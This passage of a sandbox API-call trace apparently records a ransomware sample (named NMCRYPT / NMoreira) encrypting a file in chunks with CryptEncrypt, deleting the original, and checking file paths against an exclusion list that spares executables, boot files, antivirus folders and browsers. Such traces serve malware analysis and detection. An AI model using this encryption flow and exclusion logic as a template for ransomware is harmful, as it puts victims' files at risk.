lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.020] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.020] GetLastError () returned 0x0 [0163.020] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.020] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.020] GetLastError () returned 0x0 [0163.020] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.020] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.020] GetLastError () returned 0x0 [0163.020] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0xd0, lpOverlapped=0x0) returned 1 [0163.021] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xd0, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xe0) returned 1 [0163.021] GetLastError () returned 0x0 [0163.021] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xe0, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0163.021] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0163.021] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf")) returned 0x20 [0163.021] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf", dwFileAttributes=0x20) returned 0 [0163.021] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf") returned 1 [0163.021] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf")) returned 0 [0163.022] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf" [0163.022] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0163.022] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF034.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf034.tmp")) returned 0xf034 [0163.022] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF034.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf034.tmp"), dwFlags=0x1) returned 0 [0163.022] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF034.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf034.tmp")) returned 1 [0163.023] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0163.023] wcslen (_String="OK") returned 0x2 [0163.023] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.023] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.023] CryptDestroyKey (hKey=0x9ad278) returned 1 [0163.023] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0163.023] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0163.023] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*NMCRYPT") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*Recovers your files.html") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*.exe") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*.dll") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*.lnk") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*.bat") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*.ini") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*.msi") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*.scf") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*pagefile.sys*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*NTUSER.DAT*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*AppData*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*\\winrar\\*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*\\Internet Explorer\\*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*\\java\\*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*\\TeamViewer\\*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*\\windows\\*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*\\ESET\\*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*\\AVG\\*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*\\AVIRA\\*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*\\AVAST Software\\*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*Atheros*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*Realtek*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*bootmgr*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*boot*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*boot*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*CONFIG.SYS*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*IO.SYS*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*MSDOS.SYS*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*NTDETECT.COM*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*ntldr*") returned 0 [0163.023] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*chrome*") returned 0 [0163.024] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*opera*") returned 0 [0163.024] PathMatchSpecW (pszFile="Garden.htm", pszSpec="*firefox*") returned 0 [0163.024] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm", pszSpec="*") returned 1 [0163.024] strlen (_Str="NMoreira") returned 0x8 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.025] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, 